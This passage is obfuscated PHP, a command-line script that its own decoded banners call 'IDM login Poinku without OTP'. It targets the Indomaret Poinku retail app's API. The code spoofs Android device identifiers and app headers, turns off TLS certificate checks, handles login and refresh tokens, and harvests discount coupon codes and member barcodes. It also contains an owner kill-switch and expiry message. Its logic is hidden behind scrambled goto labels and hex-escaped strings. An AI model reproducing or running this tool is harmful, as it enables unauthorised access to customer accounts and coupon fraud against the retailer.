  $m5BZY = GgGr_("\150\x74\164\x70\163\72\x2f\57\141\163\x69\141\x2d\163\157\x75\164\x68\145\141\163\164\62\x2d\151\x64\x6d\x2d\x63\x6f\162\160\x2d\160\x72\144\56\x63\154\x6f\x75\x64\x66\x75\156\143\164\x69\157\x6e\x73\56\x6e\145\164\x2f\151\144\x6d\x61\x70\x70\163\x5f\164\x72\x61\143\153\145\x72\137\147\x61\x74\x65\167\141\x79", $wDisp);
  goto Lv8Tl;
  x2BCx:
  echo "\12";
  goto yVAZE;
  LRQ9s:
  echo @zm6IC("\x79\x65\x6c\x6c\x6f\x77", "\102\165\151\x6c\x64\x20\102\x79\x20\106\x45\x52\x44\x59\x20\x52\101\x4d\101\x44\110\x41\116\40");
  goto dVT5w;
  tX9Oi:
  $QRhbE = explode("\12", @file_get_contents("\x66\x6f\162\x63\145\x63\x6c\157\163\145"));
  goto VDs_x;
  fkcuz:
  echo @Zm6Ic("\x6e\x65\166\171", "\40\40\40\40\x20\x20\40\40\x20\x20\131\x41\x4e\x47\40\x4e\131\105\x42\101\122\x49\x4e\40\x53\103\x52\111\x50\x54\x20\111\x4e\111\40\12");
  goto sZ35R;
  NGTs5:
  die;
  goto mPckR;
  PlUQs:
  goto V36mw;
  goto TNk5I;
  EOL7D:
  $DxrJr = "\x31\60\60\x30\60\60\60\x30\x30\60\60\x30\x30\60\x30\x30\x30\60";
  goto w0IcM;
  OeKCs:
  echo @Zm6ic("\147\162\145\145\156", $wd9cN);
  goto VXKB5;
  OCtqu:
  @unlink("\160\x6f\x69\x6e\150\x70\x2e\x70\x68\160");
  goto NR5YR;
  OpF1q:
  goto mXaLJ;
  goto HVusa;
  NR5YR:
  echo "\xa";
  goto BYxXO;
  T8xTD:
  PG5CP:
  goto lxWr0;
  WH0T2:
  goto xrVSZ;
  goto BqavN;
  WkvW9:
  goto itKyS;
  goto pqL5O;
  oR6TB:
  $N0ol8 = XwL4L();
  goto nMz0f;
  VTNC_:
  $U_EVz = @$owfHy["\144\x61\164\141"][0]["\163\165\142\104\151\163\x74\x72\151\143\x74"]["\x73\165\142\104\151\x73\x74\x72\x69\x63\x74\103\157\x64\x65"];
  goto u7ReR;
  gI0WO:
  if (!($fUekS == '')) {
    goto vR5mg;
  }
  goto g13L4;
  cirbZ:
  echo "\xa";
  goto Lqpb5;
  nOHFN:
  $qtgR3 = "\x30";
  goto CZ_oJ;
  ayaqJ:
  $efQM2 = count($QRhbE) - 1;
  goto F_rzk;
  J4tGg:
  $yPeiy = @$H1g60["\162\x65\x66\162\x65\163\150\124\x6f\153\145\x6e"];
  goto EBBgy;
  DyuhB:
  $Q6vWf = @$lImQC["\144\141\164\141"]["\x63\157\x6e\x74\145\x6e\164"][12]["\x63\157\165\160\x6f\x6e\x43\157\144\x65"];
  goto KEzEt;
  UOEEY:
  $wDisp = "\173\42\160\x68\157\156\145\116\x75\155\x62\145\x72\42\72\42" . $zn5zd . "\42\x2c\x22\x64\x65\166\151\143\x65\x49\x64\42\x3a\x22" . $aY0el . "\42\175";
  goto cXup3;
  r7FiT:
  echo "\12";
  goto zAuJD;
  jBZZl:
  echo @zm6ic("\171\x65\x6c\154\157\167", "\x45\155\x61\151\x6c\x20\120\145\156\145\162\x69\x6d\141\x20\x20\x3a\40");
  goto FxbAU;
  w30J6:
  $efQM2 = count($QRhbE) - 1;
  goto SWeRy;
  MT4VT:
  echo @zm6IC("\x79\145\154\154\x6f\167", "\112\165\x6d\154\141\x68\x20\121\165\157\x74\141\x20\40\40\x20\72\40");
  goto pWpjD;
  Ahdwh:
  goto OTLN4;
  goto yiSTB;
  CzdBB:
  $ucJzj = @$lImQC["\x64\141\x74\141"]["\x63\x6f\156\164\145\x6e\164"][14]["\143\157\x75\160\157\156\116\141\155\145"];
  goto Uy_YH;
  M6z1l:
  echo @ZM6IC("\x79\x65\154\x6c\157\x77", "\x53\164\x61\x74\x75\x73\x20\x50\145\143\141\x68\x69\156\x20\102\x69\152\151\x20\x3a\40");
  goto ctI1q;
  QshuZ:
  if (!($fUekS == '')) {
    goto NLSP5;
  }
  goto KhDEm;
  feVpL:
  function I00f8($lEbop, $eOlDi, $tj7_x, $LgWaY)
  {
    goto qypGw;
    Hs0M5:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto vFmgZ;
    vFmgZ:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto MQ5S3;
    tp9EL:
    $ruc3h[] = "\153\x65\171\x3a\x20\x5a\x57\x52\x30\x63\x7a\111\167\115\x6a\x45\x36\x4d\110\x42\x73\142\x57\71\162\x62\147\x3d\x3d";
    goto KdCNu;
    DmmfM:
    $ruc3h[] = "\165\163\x65\x72\x2d\141\x67\145\x6e\164\x3a\x20\x6f\153\x68\x74\x74\160\x2f\64\56\71\x2e\x30";
    goto TbuFE;
    JiQ2P:
    $AXlcQ = json_decode($y7f11, true);
    goto Cpm6m;
    azkcU:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto DmmfM;
    kxsuN:
    Wk8ay:
    goto IuFQD;
    qypGw:
    $C6npe = curl_init();
    goto ku5Ag;
    ku5Ag:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto fTd7I;
    pwTTx:
    $ruc3h[] = "\110\157\x73\x74\72\40\145\x64\x74\x73\x61\x70\x70\x2e\151\156\144\x6f\155\x61\x72\x65\x74\x70\157\x69\156\x6b\165\x2e\x63\157\x6d";
    goto tp9EL;
    fTd7I:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto azkcU;
    t0Awd:
    YvOUs:
    goto JiQ2P;
    Cpm6m:
    print_r($AXlcQ);
    goto Q0lKp;
    HqXzg:
    if (!$P7lm9) {
      goto Wk8ay;
    }
    goto qPZdK;
    qPZdK:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto iV79d;
    Q0lKp:
    return $ECuqv;
    goto C9VP9;
    zOq3U:
    goto YvOUs;
    goto kxsuN;
    IuFQD:
    return false;
    goto t0Awd;
    RqP5D:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\156\x64\x6f\x2e\164\x78\164");
    goto ymrfV;
    iV79d:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto zOq3U;
    MQ5S3:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto RqP5D;
    fNDXb:
    $P7lm9 = curl_getinfo($C6npe);
    goto HqXzg;
    KdCNu:
    $ruc3h[] = "\x7b\42\x61\x70\160\x5f\x76\145\162\x73\x69\157\156\x22\72\42\x33\x2e\61\63\56\60\42\x2c\42\144\145\x76\151\143\x65\137\x63\x6c\141\x73\x73\x22\x3a\42\120\x68\x6f\156\145\42\54\42\x64\x65\x76\x69\x63\145\x5f\x66\x61\x6d\151\x6c\171\x22\x3a\42" . $tj7_x . "\x22\x2c\42\x64\145\166\151\143\145\x5f\x69\x64\x22\72\42" . $eOlDi . "\42\54\x22\x6f\x73\137\x6e\141\155\x65\x22\72\x22\x41\x6e\x64\x72\x6f\x69\x64\40\x50\42\x2c\x22\157\x73\x5f\166\145\162\163\x69\157\156\x22\x3a\x22\x41\156\144\x72\157\x69\x64\x20\x39\42\175";
    goto Hs0M5;
    ymrfV:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\x6e\x64\x6f\56\x74\170\164");
    goto CiUXS;
    CiUXS:
    $ECuqv = curl_exec($C6npe);
    goto fNDXb;
    TbuFE:
    $ruc3h[] = "\x61\x75\x74\x68\157\162\151\172\x61\164\151\157\156\72\40\x42\x65\141\x72\145\162\x20" . $LgWaY;
    goto pwTTx;
    C9VP9:
  }
  goto CAqX2;
  pJUW3:
  echo "\xa";
  goto fpw_v;
  SWo9o:
  H9U4H:
  goto X2LRu;
  ohdy7:
  $Gukt8 = $eqo_P;
  goto O2W6_;
  msggy:
  shell_exec("\x73\x74\x61\x72\x74\40\x63\x68\x72\x6f\155\x65\40\42\150\164\x74\x70\x73\72\x2f\57\142\x61\x72\x63\x6f\144\145\56\164\x65\143\x2d\x69\x74\56\143\157\x6d\57\142\x61\162\143\x6f\144\145\x2e\x61\163\150\x78\77\144\x61\164\141\x3d\x22" . $zn5zd . "\42\x26\143\157\144\x65\x3d\103\x6f\144\x65\61\62\x38\46\x6d\x75\154\x74\x69\x70\x6c\x65\142\x61\x72\143\157\144\x65\163\75\146\141\x6c\x73\x65\46\x74\x72\141\156\163\x6c\x61\x74\x65\x2d\145\163\143\75\164\162\x75\145\46\x75\x6e\151\x74\x3d\106\x69\x74\x26\x64\x70\x69\x3d\71\x36\46\x69\155\141\147\145\164\x79\160\x65\75\107\x69\146\46\x72\x6f\164\x61\164\x69\157\x6e\x3d\x30\x26\x63\x6f\x6c\x6f\162\x3d\x25\62\x33\x30\60\x30\x30\x30\x30\46\x62\x67\x63\x6f\154\x6f\162\x3d\x25\62\63\146\x66\146\x66\x66\146\x26\x63\x6f\x64\x65\160\141\147\145\x3d\x44\145\146\x61\165\x6c\164\46\161\165\x6e\151\x74\x3d\x4d\x6d\46\x71\165\x69\145\164\x3d\61\60\x26\x68\151\x64\x65\x68\162\x74\75\106\x61\x6c\163\x65\x22");
  goto Uj8_1;
  ihLm0:
  $YXsOG = @$Ap1KM["\x6d\145\x73\x73\141\147\x65"];
  goto dhjGK;
  Dv40u:
  BIMja:
  goto Y7GSJ;
  E3UbE:
  if (!($cPDPt == 4)) {
    goto sfkUi;
  }
  goto fWyr0;
  kTSvg:
  echo @Zm6IC("\171\x65\154\x6c\x6f\167", "\174\x20\x57\x41\40\60\x38\x32\x31\x37\x36\x33\x35\x38\62\x39\x35\40\12");
  goto vG0Az;
  FhWKb:
  $owfHy = json_decode($Jk9cx, true);
  goto yncKT;
  ZnmJM:
  echo "\12";
  goto AHwgY;
  WvdVD:
  if (!($zcN5u == '')) {
    goto FIsIZ;
  }
  goto QVT4_;
  O1aXH:
  $Ap1KM = json_decode($Jk9cx, true);
  goto BIJOG;
  cMepj:
  $YXsOG = @$Ap1KM["\x6d\145\163\163\141\x67\145"];
  goto vXYtL;
  ypXdS:
  $wlJRC = XozB4(array("\x7c"), $wZnHP)[1];
  goto BdILS;
  ubtTf:
  $aY0el = $v1ZMX;
  goto lFjF7;
  GSEf6:
  @unlink("\160\157\x69\x6e\150\160\56\160\150\x70");
  goto QDJgG;
  uyuCs:
  echo "\xa";
  goto XniUI;
  V3qBg:
  $GOXkU = $w5ulg;
  goto scrxk;
  oR8Sv:
  echo @Zm6ic("\x6e\145\x76\171", "\40\x7c\40\123\x63\x72\151\x70\164\x20\x49\x44\x4d\x20\x4c\117\107\x49\116\40\x50\x4f\111\x4e\x4b\x55\40\124\101\x4e\x50\x41\x20\117\x54\x50\xa");
  goto JoF2q;
  h9f4o:
  UWLRz:
  goto J_QAU;
  H3Rse:
  goto skjRn;
  goto BOyow;
  OzzD7:
  echo "\xa";
  goto hx1RQ;
  MxiV2:
  echo @Zm6Ic("\156\145\x76\x79", "\x50\x69\154\x69\150\x20\x4b\x65\x6c\x75\x72\x61\150\141\156\40\115\x61\156\141\x20\77\40\x3a\x20");
  goto kz8l7;
  mxI0I:
  goto w5u0B;
  goto vdihH;
  wvA9a:
  $p4iky = @$Ap1KM["\x64\x61\164\x61"]["\x6d\145\155\x62\145\x72\x49\144"];
  goto wzo6j;
  svrS2:
  @unlink("\160\157\151\x6e\150\160\56\160\x68\x70");
  goto OWQFJ;
  jdGHB:
  $zn5zd = $U0YgX;
  goto JIZH5;
  bNJdD:
  $Jk9cx = g8Pf2("\x68\164\164\160\163\x3a\x2f\57\145\144\164\x73\141\x70\x70\56\x69\156\144\x6f\155\x61\162\145\x74\160\157\x69\156\153\165\x2e\143\x6f\155\57\143\157\x6e\146\x69\147\x75\162\141\164\x69\x6f\x6e\57\x61\160\151\170\x2d\x31\x35\60\62\55\141\x70\x69\x2f\155\x6f\x62\x69\154\145\x2f\x73\x79\x2d\x61\x70\x70\55\166\x65\162\163\151\x6f\156\x2f\x67\145\x74\55\x76\145\162\163\x69\157\x6e\x2d\x6b\x65\171\57\101\116\x44\x52\x4f\x49\104", $aY0el, $GOXkU, $mlMLt);
  goto naXLO;
  w1dsu:
  echo @Zm6iC("\x6e\x65\166\171", "\x41\153\x75\156\x20\x4b\x65\x20\x20\x20\40\40\40\40\x20\72\x20");
  goto ktT1F;
  XZK0M:
  $H1g60 = json_encode($IKJzx, true);
  goto rHfbp;
  Wyaqr:
  if (!($cPDPt == 2)) {
    goto kQ7gd;
  }
  goto tmEqL;
  hNZdX:
  echo "\xa";
  goto XJ4uX;
  u8rId:
  kQ7gd:
  goto Fr1xl;
  WdaDw:
  @unlink("\x70\157\151\156\x68\160\x2e\x70\x68\x70");
  goto xr6FM;
  SwrwN:
  $DxrJr = "\x31\x30\60\60\x30\60\x30\60\60\x30\60\60\x30\x30\x30\60\x30\60";
  goto Nz0TL;
  Fpl08:
  $pugmZ = @$owfHy["\144\141\x74\141"][0]["\160\x6f\163\164\x61\154\x43\157\x64\145\111\144"];
  goto p1Pvo;
  CeZ6r:
  echo @Zm6iC("\162\x65\x64", $zn5zd);
  goto L1Xq4;
  sxiVh:
  function Pcm6T($lEbop)
  {
    goto PqQvA;
    q1aGT:
    if (!$P7lm9) {
      goto t0lzY;
    }
    goto PTyLo;
    qmCoA:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto lgzv4;
    xUy_Z:
    return $ECuqv;
    goto fprn_;
    pqHYy:
    $ruc3h[] = "\103\x6f\156\156\145\143\164\151\157\x6e\x3a\40\x4b\145\145\160\x2d\101\154\x69\166\x65";
    goto Fj1Oi;
    SB3xR:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto CEhj0;
    aAyGV:
    goto xbz9p;
    goto uER8H;
    wNCI1:
    xbz9p:
    goto MFVjt;
    ZOmuG:
    $ECuqv = curl_exec($C6npe);
    goto PjdjV;
    MFVjt:
    $AXlcQ = json_decode($y7f11, true);
    goto oiPjV;
    ehL7E:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto W3xvF;
    CEhj0:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x6b\154\151\153\x2e\x74\170\x74");
    goto t0aKc;
    lgzv4:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto ehL7E;
    HgthA:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto aAyGV;
    PqQvA:
    $C6npe = curl_init();
    goto qmCoA;
    W3xvF:
    $ruc3h[] = "\125\x73\x65\162\x2d\x41\x67\145\x6e\x74\x3a\40\157\153\x68\164\164\160\57\65\x2e\x30\x2e\x30\55\x61\x6c\x70\150\x61\x2e\x35";
    goto pqHYy;
    uER8H:
    t0lzY:
    goto coZ3r;
    coZ3r:
    return false;
    goto wNCI1;
    PjdjV:
    $P7lm9 = curl_getinfo($C6npe);
    goto q1aGT;
    t0aKc:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\153\154\x69\153\56\164\x78\164");
    goto ZOmuG;
    oiPjV:
    print_r($AXlcQ);
    goto xUy_Z;
    OzSAE:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto SB3xR;
    PTyLo:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto HgthA;
    Fj1Oi:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto OzSAE;
    fprn_:
  }
  goto h2nah;
  yvqsu:
  echo @zm6iC("\x6e\145\x76\171", $ZNU2M);
  goto uyuCs;
  kJkzB:
  shell_exec("\x73\x74\141\162\x74\x20\x63\150\162\157\155\145\x20\42\150\164\164\160\163\72\57\x2f\x62\141\162\x63\x6f\x64\x65\56\x74\x65\x63\x2d\151\164\x2e\x63\x6f\155\57\x62\141\162\143\157\144\145\x2e\x61\163\150\170\x3f\144\x61\x74\x61\x3d\42" . $p4iky . "\x22\x26\x63\x6f\x64\x65\x3d\103\157\x64\145\x31\62\70\x26\x6d\165\154\x74\x69\160\x6c\145\x62\141\x72\143\x6f\144\145\163\x3d\x66\x61\154\x73\145\x26\164\x72\141\x6e\x73\154\x61\x74\145\x2d\145\163\143\x3d\x74\162\x75\x65\x26\x75\156\x69\164\75\106\x69\x74\x26\x64\160\x69\x3d\x39\66\x26\x69\x6d\141\x67\145\x74\x79\x70\x65\x3d\x47\x69\x66\46\162\157\164\141\x74\x69\157\x6e\75\60\x26\143\x6f\154\x6f\162\75\45\62\63\x30\x30\x30\60\60\x30\x26\x62\147\x63\157\x6c\157\x72\75\x25\x32\63\146\x66\146\x66\x66\x66\46\143\157\x64\x65\160\141\147\145\75\x44\145\146\141\x75\x6c\164\x26\x71\x75\156\x69\164\x3d\115\155\x26\161\x75\x69\145\164\75\61\60\x26\150\151\x64\x65\x68\x72\164\75\x46\141\154\163\145\x22");
  goto penYb;
  UAyjl:
  if (!($fUekS == '')) {
    goto H9U4H;
  }
  goto ZHFaV;
  wdlw0:
  echo "\xa";
  goto dTj8e;
  HrweK:
  $mlMLt = $obc_G;
  goto MIRP3;
  WGRLf:
  if (!($l9PIA == '')) {
    goto JyBDM;
  }
  goto q3S0N;
  ZtjOR:
  fl6lv:
  goto UXRYi;
  syYB4:
  $jTEU0++;
  goto HK40j;
  pe2QH:
  echo "\12";
  goto w7yv5;
  ijTty:
  echo "\xa";
  goto Gni3W;
  yuVmv:
  $jTEU0 = trim(fgets(STDIN));
  goto QwxVQ;
  LCM7I:
  print_r($XTuz1);
  goto wak68;
  JXPEQ:
  $tqWr2 = $zvt88[0];
  goto O9ca7;
  NqQix:
  @unlink("\x70\157\151\156\150\x70\x2e\x70\x68\160");
  goto BH7Bk;
  ReqYZ:
  echo @Zm6iC("\147\x72\x65\x65\x6e", "\x4d\141\165\x20\x54\165\153\141\162\x20\x50\162\x6f\144\165\153\40\115\141\x6e\x61\40\x3f\x20\x3a\40");
  goto XQkYc;
  LyT7u:
  $nb9cm = round(microtime(true) * 1000);
  goto QLRL1;
  udatF:
  goto aOh1Q;
  goto w_yIX;
  z8qyV:
  echo @zm6ic("\156\x65\x76\171", $WtCiL);
  goto noF8q;
  NDC6U:
  echo "\12";
  goto Hl0fv;
  OXStz:
  if (!($jTEU0 < $S8W9D)) {
    goto FBh50;
  }
  goto Lw5kj;
  pRlaN:
  echo "\xa";
  goto utKOm;
  kWk_Z:
  echo @zm6iC("\x6e\145\x76\x79", "\x53\157\162\x72\171\54\40\x54\150\151\x73\40\x53\x63\162\151\x70\164\40\x48\x61\x73\x20\102\145\x65\156\x20\x52\x65\x6d\157\x76\145\x64\x20\102\171\40\124\x68\145\40\117\167\156\x65\162\41\x21");
  goto ganFQ;
  lY4tW:
  if ($PKr5B == "\x44\151\x73\x6b\x6f\x6e\x20\122\x70\x20\x32\x35\x2e\x30\x30\60\40\x4b\154\x69\x6b\x20\111\156\144\x6f\155\x61\x72\x65\x74") {
    goto SCsGz;
  }
  goto VQBza;
  gl2qM:
  $WYrgv = @$H1g60["\146\151\144"];
  goto PbA2u;
  j1Osj:
  die;
  goto WxP0S;
  ZQ2mS:
  j7pkX:
  goto nDicY;
  VwnFr:
  echo "\xa";
  goto LLojs;
  BOv0N:
  y2l5l:
  goto Rfnnj;
  A2BXs:
  goto itKyS;
  goto Kk5nB;
  ZQW9J:
  $M1ADy = @$Ap1KM["\144\141\x74\141"]["\151\144"];
  goto p1xRY;
  n_WdW:
  $BcbF3 = @$Ap1KM["\144\x61\x74\x61"]["\160\x68\x6f\x6e\x65\116\165\155\142\x65\x72"];
  goto x7MT3;
  udJYZ:
  echo "\123\141\x6d\160\x61\151\x20\x42\x61\162\x69\163\40\x4b\145\40\72\40";
  goto Plsof;
  jd00O:
  die;
  goto t6k9h;
  TeXIq:
  $k1y0B = g1wXT("\150\164\164\160\x73\72\x2f\x2f\x65\144\164\x73\x61\160\160\x2e\151\156\144\x6f\155\x61\162\x65\164\160\157\x69\x6e\x6b\165\56\x63\x6f\155\57\x63\x75\x73\x74\157\x6d\x65\x72\57\141\x70\151\170\55\61\65\x30\62\55\x61\x70\151\57\162\145\155\x6f\x76\x65\55\151\163\141\x6b\x75\55\164\157\x6b\145\156", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto G3G3e;
  tcJMt:
  $wDisp = "\x7b\42\143\x75\163\164\x6f\155\145\162\x47\x61\x6d\x65\111\144\x22\72\42" . $ypyz5 . "\42\x7d";
  goto xSEI4;
  cqT9Y:
  echo @zm6ic("\156\145\166\171", "\x53\x6f\x72\x72\x79\x2c\x20\124\x68\x69\163\x20\x53\x63\x72\151\x70\x74\40\x48\x61\x73\40\102\145\145\x6e\40\x52\145\155\157\x76\x65\x64\40\x42\x79\40\124\x68\x65\x20\x4f\x77\156\145\162\41\41");
  goto CAPOM;
  FOA_7:
  echo @ZM6ic("\156\145\x76\x79", "\123\x6f\x72\162\x79\54\40\124\150\151\163\40\x53\143\x72\151\x70\164\x20\110\141\x73\40\x42\x65\145\156\40\x52\145\x6d\157\166\x65\144\x20\102\x79\x20\x54\150\x65\40\x4f\x77\x6e\145\x72\x21\41");
  goto M3PcJ;
  sWeiZ:
  $wDisp = "\x7b\42\x63\151\164\171\x22\72" . $JrTpE . "\54\x22\143\151\164\171\x4e\141\x6d\145\42\x3a\x22" . $b2ucB . "\x22\54\42\x64\x69\x73\x74\162\151\143\x74\42\x3a" . $L1qpJ . "\x2c\42\x64\x69\163\x74\162\x69\x63\164\116\x61\155\145\42\x3a\42" . $yJiD4 . "\42\x2c\x22\153\x65\171\167\x6f\x72\144\42\72\x22" . $ZqwwP . "\x22\54\42\160\x72\x6f\x76\x69\x6e\x63\145\42\72" . $Ipl73 . "\54\x22\x70\162\x6f\166\151\x6e\x63\145\x4e\141\155\x65\42\72\x22" . $K4tCB . "\x22\x7d";
  goto fDalJ;
  al2pj:
  $u35jw = count($m0f8X) - 1;
  goto qducy;
  ICV3b:
  echo @ZM6IC("\x79\x65\154\154\157\x77", "\x7c\40\127\x41\x20\x30\70\62\61\x37\66\63\65\x38\62\x39\x35\40\12");
  goto R3mvs;
  Os2_6:
  echo @ZM6IC("\x79\x65\154\154\157\167", "\x54\141\x6e\x67\x67\141\154\40\x45\170\x70\x69\x72\145\x64\x20\40\x3a\40");
  goto Crsbt;
  DIopi:
  echo "\xa";
  goto lfA_D;
  t4a2M:
  $rVPVc = trim(fgets(STDIN));
  goto W8yAD;
  mF3S_:
  $aY0el = $v1ZMX;
  goto tsqUz;
  i_i2N:
  echo "\12";
  goto p29CQ;
  itd9E:
  $wDisp = "\173\42\144\x61\164\x61\42\72\x5b\x7b\42\141\x70\x70\154\x69\143\141\x74\151\x6f\156\42\x3a\173\x22\x61\x70\x70\x5f\166\145\x72\163\x69\157\x6e\x22\x3a\x22\x33\x2e\x31\x33\x2e\x30\42\x2c\x22\144\145\166\151\143\145\x5f\x63\154\141\x73\x73\42\x3a\x22\x50\x68\157\x6e\145\42\54\42\144\x65\x76\x69\x63\145\x5f\146\141\155\151\x6c\171\42\x3a\x22" . $GOXkU . "\x22\x2c\x22\144\x65\166\x69\143\x65\137\x69\x64\42\72\x22" . $aY0el . "\x22\x2c\42\157\163\x5f\156\x61\x6d\145\42\72\x22\x41\x6e\144\162\x6f\x69\144\x20\x50\42\54\x22\x6f\x73\x5f\x76\x65\x72\163\151\x6f\156\42\x3a\42\101\x6e\x64\x72\157\x69\x64\40\x39\42\x7d\54\42\x63\157\x72\x65\42\72\x7b\x22\141\143\164\151\x76\x69\164\x79\137\x64\145\x74\x61\x69\x6c\163\42\72\42\162\x65\163\165\155\145\137\141\x70\x70\x22\54\42\x65\166\x65\x6e\164\137\x6e\141\x6d\145\x22\72\42\x61\x70\160\x5f\141\x63\x74\x69\166\151\164\x79\x22\x2c\x22\145\x76\145\x6e\x74\137\x74\x69\x6d\x65\163\x74\141\x6d\160\x22\x3a" . $nb9cm . "\x7d\54\42\165\163\x65\x72\x22\x3a\x7b\x22\x73\145\163\x73\x69\157\x6e\x5f\x69\x64\x22\x3a\42" . $MXjqh . "\42\x2c\42\x75\163\x65\x72\137\151\160\x5f\x61\144\x64\x72\145\x73\163\x22\72\x22\61\62\x37\x2e\60\x2e\x30\x2e\61\42\x7d\175\135\175";
  goto wabM5;
  bb1uz:
  echo "\xa";
  goto t5Qik;
  g8ynI:
  $wZnHP = $lPULW[$jTEU0];
  goto CfXzE;
  ot1CO:
  echo shell_exec("\x78\x64\x67\55\157\x70\x65\x6e\40\x22\150\164\x74\160\163\x3a\x2f\57\x62\x61\x72\x63\x6f\x64\x65\x2e\164\x65\143\55\x69\164\56\143\157\155\x2f\x62\x61\x72\x63\157\144\145\56\x61\163\x68\x78\77\144\x61\164\x61\75\x22" . $p4iky . "\x22\46\143\157\144\145\x3d\103\x6f\x64\x65\61\x32\70\46\x6d\165\154\164\x69\x70\154\145\x62\x61\162\143\157\144\x65\163\x3d\146\x61\154\x73\x65\x26\164\x72\141\156\x73\x6c\141\164\x65\x2d\x65\x73\143\75\164\x72\165\145\x26\x75\156\151\x74\x3d\106\x69\164\x26\x64\x70\151\75\x39\x36\x26\x69\155\x61\x67\145\164\x79\x70\145\75\x47\151\146\x26\162\x6f\x74\141\164\x69\x6f\156\75\x30\x26\143\x6f\x6c\x6f\x72\x3d\45\x32\x33\x30\x30\x30\60\x30\x30\46\x62\x67\143\x6f\154\157\162\x3d\45\x32\x33\x66\146\146\146\146\x66\x26\x63\x6f\144\145\x70\141\147\145\75\x44\145\x66\141\x75\x6c\x74\46\161\x75\156\x69\x74\x3d\x4d\x6d\x26\161\165\151\145\x74\75\x31\60\x26\x68\151\144\x65\150\162\164\75\106\x61\154\x73\145\42");
  goto phNSJ;
  UNWVG:
  echo "\xa";
  goto AdPvR;
  rPYX1:
  $yy9BI = "\60";
  goto PLeOQ;
  WtOtG:
  @unlink("\143\150\141\143\x65");
  goto UYqSC;
  FxbAU:
  echo @zm6iC("\156\145\166\x79", $SD3v6);
  goto RM5B6;
  X9ZA_:
  echo @zM6ic("\162\145\x64", "\x53\143\162\151\160\x74\40\x45\170\x70\151\162\145\x64\54\x20\x48\165\x62\x75\156\x67\x69\40\x43\162\x65\x61\x74\157\x72\40\x68\x74\164\160\x73\x3a\57\x2f\167\x61\x2e\155\x65\57\66\x32\70\62\61\x37\66\63\x35\70\x32\71\65\xa");
  goto t2sPb;
  k0G65:
  function XuulN($PGTBJ)
  {
    goto iEXTs;
    Rni4n:
    session_write_close();
    goto TZitq;
    Ps_ce:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto vfRk9;
    QzYCJ:
    return $ECuqv;
    goto YPM0c;
    YlIc8:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto LOY7a;
    iEXTs:
    $C6npe = curl_init();
    goto mdNCX;
    G9kCp:
    $P7lm9 = curl_getinfo($C6npe);
    goto CFzIB;
    jYKhb:
    $ruc3h[] = "\x4f\162\x69\147\x69\156\x3a\x20\150\x74\x74\x70\x73\x3a\x2f\57\167\x77\x77\x2e\x77\150\x61\164\x69\163\x6d\x79\x69\160\56\x63\157\155";
    goto nhUX1;
    TZitq:
    $ECuqv = curl_exec($C6npe);
    goto G9kCp;
    MLk8t:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto AAZNC;
    YxCV8:
    $ruc3h[] = "\x41\x63\143\145\160\x74\x3a\40\x2a\57\x2a";
    goto jYKhb;
    mdNCX:
    curl_setopt($C6npe, CURLOPT_URL, "\150\x74\164\x70\163\x3a\x2f\x2f\141\x70\151\x2e\167\150\x61\x74\151\163\x6d\x79\151\160\x2e\x63\157\x6d\x2f\167\151\155\151\56\x70\150\x70");
    goto MLk8t;
    nhUX1:
    $ruc3h[] = "\122\145\146\x65\162\x65\x72\x3a\x20\x68\164\x74\x70\163\x3a\x2f\x2f\x77\x77\167\56\x77\150\x61\164\x69\163\x6d\x79\151\x70\x2e\x63\157\x6d\57";
    goto YTMrX;
    CFzIB:
    if ($P7lm9) {
      goto QcxQE;
    }
    goto XsYn6;
    AAZNC:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto iPIxn;
    Moyxu:
    QcxQE:
    goto JsV4E;
    XsYn6:
    return false;
    goto Moyxu;
    iPIxn:
    curl_setopt($C6npe, CURLOPT_CUSTOMREQUEST, "\107\105\124");
    goto W996Y;
    EitVd:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto Ps_ce;
    eWHNo:
    print_r($AXlcQ);
    goto QzYCJ;
    W996Y:
    $ruc3h[] = "\125\x73\145\x72\55\x41\147\x65\156\164\72\40" . $PGTBJ;
    goto YxCV8;
    LOY7a:
    $AXlcQ = json_decode($y7f11, true);
    goto eWHNo;
    PvK2z:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x6b\154\151\153\56\x74\x78\164");
    goto q5lYY;
    JsV4E:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto YlIc8;
    vfRk9:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto PvK2z;
    q5lYY:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\153\154\151\153\x2e\164\x78\x74");
    goto Rni4n;
    YTMrX:
